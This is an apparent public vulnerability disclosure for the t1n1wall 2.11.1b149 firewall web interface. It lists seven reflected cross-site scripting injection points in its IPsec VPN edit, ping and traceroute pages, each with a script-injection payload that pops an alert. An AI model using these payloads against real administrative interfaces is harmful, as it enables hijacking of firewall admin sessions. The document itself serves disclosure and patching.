##################################################################################################################################
# Exploit Title: t1n1wall 2.11.1b149 | Cross-Site Scripting
# Date: 02.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://t1n1wall.com
# Software Link:
https://sourceforge.net/projects/t1n1wall/files/latest/download
# Version: 2.11.1b149
##################################################################################################################################

Introduction

t1n1wall

As m0n0wall decided to close it's doors, and no further development is
planned, I have created a fork.
follow links above for downloads



#################################################################################


XSS details: Reflected

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
remotenet

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
remotegw

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p1myident

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p1lifetime

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Reflected

URL
http://192.168.2.200/vpn_ipsec_edit.php

METHOD
Post

PARAMETER
p2lifetime

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Reflected

URL
http://192.168.2.200/diag_ping.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(7)</script>

#################################################################################